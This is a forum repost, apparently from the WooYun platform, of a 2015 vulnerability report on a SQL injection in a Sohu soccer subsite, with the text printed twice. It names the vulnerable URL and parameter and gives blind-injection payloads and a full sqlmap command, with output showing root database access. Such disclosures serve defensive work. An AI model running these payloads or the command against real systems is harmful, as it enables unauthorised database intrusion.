-
-
搜狐某分站存在ROOT权限SQL注入漏洞
-
发表于: 2015-12-5 23:13 1264
-
公开时间: 2015-12-05 17:34
转自:http://www.wooyun.org/bugs/wooyun-2015-0148419
简要描述:
搜狐某分站存在ROOT权限SQL注入漏洞
详细说明:
#1 存在问题网站
http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule?dateTime=2015-10-21
#2 注入类型
code 区域
Parameter: dateTime (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dateTime=2015-07-27%' AND 3147=3147 AND '%'='
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: dateTime=2015-07-27%' AND SLEEP(5) AND '%'='
漏洞证明:
code 区域
python sqlmap.py -u "http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule" --data "dateTime=2015-07-27" --random-agent --current-db --threads 5
current user: 'root@%'
current database: 'SoccerDataCenter'
修复方案:
类型转换
转自:http://www.wooyun.org/bugs/wooyun-2015-0148419
简要描述:
搜狐某分站存在ROOT权限SQL注入漏洞
详细说明:
#1 存在问题网站
http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule?dateTime=2015-10-21
#2 注入类型
code 区域
Parameter: dateTime (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: dateTime=2015-07-27%' AND 3147=3147 AND '%'='
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: dateTime=2015-07-27%' AND SLEEP(5) AND '%'='
漏洞证明:
code 区域
python sqlmap.py -u "http://soccer.m.sohu.com/GlobalSoccerCenter/Reception/InceludSchedule" --data "dateTime=2015-07-27" --random-agent --current-db --threads 5
current user: 'root@%'
current database: 'SoccerDataCenter'
修复方案:
类型转换
赞赏
看原图
赞赏
雪币:
留言: